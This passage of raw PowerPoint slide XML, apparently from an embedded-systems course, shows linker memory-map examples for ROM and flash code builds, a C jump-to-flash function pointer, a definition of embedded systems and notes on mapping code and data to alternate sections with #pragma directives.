              </a:rPr>
              <a:t>   ROM_DATA: ORIGIN = ROM_DATA_START, LENGTH = ROM_DATA_SIZE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   FLASH_RAM_AREA: ORIGIN = FLASH_RAM_AREA_START, LENGTH = RAM_SIZE – ROM_DATA_SIZE</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ROM_DATA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="381000"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Locating example #2 – ROM  code build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553" y="4419600"/>
            <a:ext cx="2725375" cy="19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29100" y="4267200"/>
            <a:ext cx="990600" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>RAM_START</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993874" y="4405699"/>
            <a:ext cx="1461052" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>ROM_DATA_START</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523422" y="4800600"/>
            <a:ext cx="1914939" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>FLASH_RAM_AREA_START</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="4419600"/>
            <a:ext cx="5008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7" name="Straight Arrow Connector 4096"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="-600000">
            <a:off x="5334000" y="4939098"/>
            <a:ext cx="3865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0696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304800" y="1720850"/>
            <a:ext cx="8534400" cy="46164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RAM_START = 0x00100000;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>RAM_SIZE = 1M;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROM_DATA_SIZE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>= 32K;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ROM_DATA_START = RAM_START;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FLASH_RAM_AREA_START = ROM_DATA_START + ROM_DATA_SIZE;</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16K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ROM_DATA: ORIGIN = ROM_DATA_START, LENGTH = ROM_DATA_SIZE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   FLASH_RAM_AREA: ORIGIN = FLASH_RAM_AREA_START, LENGTH = RAM_SIZE – ROM_DATA_SIZE</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FLASH_RAM_AREA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="381000"/>
            <a:ext cx="8229600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" kern="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Locating example #2 – Flash code build</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553" y="4419600"/>
            <a:ext cx="2725375" cy="19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29100" y="4267200"/>
            <a:ext cx="990600" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>RAM_START</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3993874" y="4405699"/>
            <a:ext cx="1461052" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>ROM_DATA_START</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523422" y="4800600"/>
            <a:ext cx="1914939" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>FLASH_RAM_AREA_START</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5219700" y="4419600"/>
            <a:ext cx="5008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600000">
            <a:off x="5334000" y="4939098"/>
            <a:ext cx="3865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9267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Locating example #2 – ROM code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="2366963"/>
            <a:ext cx="7848600" cy="2586037"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>extern char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FLASH_RAM_AREA_START[];</a:t>
            </a:r>
          </a:p>
          <a:p>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JumpToFlash</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sv-SE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flash_entry_func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE"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sv-SE" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>flash_entry_func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" sz="1800" dirty="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(void(*)())(unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>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sv-SE" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FLASH_RAM_AREA_START</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flash_entry_func</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endParaRPr lang="en-US" sz="1800"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10701730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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="228600"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mapping Memory Areas – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>another example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25603" name="TextBox 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200" y="1752600"/>
            <a:ext cx="8915400" cy="43624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RAM: ORIGIN = 0x00010000 LENGTH = 4M</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   ROM: ORIGIN = 0x00800000 LENGTH = 512K</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a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      * (LIT): {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   } &gt; 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 {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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 { * {.</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 }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      _SDA_BASE_=SIZEOF(.</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)+SIZEOF(.</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)&lt;=255?ADDR(.</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):ADDR(.</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)+256;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      *(DATA): {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      *(BSS): {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      .stack ALIGN(4) SIZE(DEFINED _STACKSIZE?_STACKSIZE:65536): {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      .heap? ALIGN(4) SIZE(DEFINED _HEAPSIZE?_HEAPSIZE:0): {}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   } &gt; 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867573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smtClean="0"/>
              <a:t>Embedded System - Definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Embedded System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is a system that contains a micro-processor to perform a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" smtClean="0"/>
              <a:t>dedicated function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Compare with: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>General Purpose Computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (PC, laptop) which can perform a wide variety of operations depending on the executed program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>Embedded System</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> is any system that contains a micro-processor but is not a general-purpose computer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Alternate sections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Code and data can be mapped similarly to alternate sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Span over several memory devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Group data with some common aspect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Map to predefined memory address used by HW</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>This is done using #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>pragma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> BSS(), #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>pragma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Code(), #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>pragma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> Data() and #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
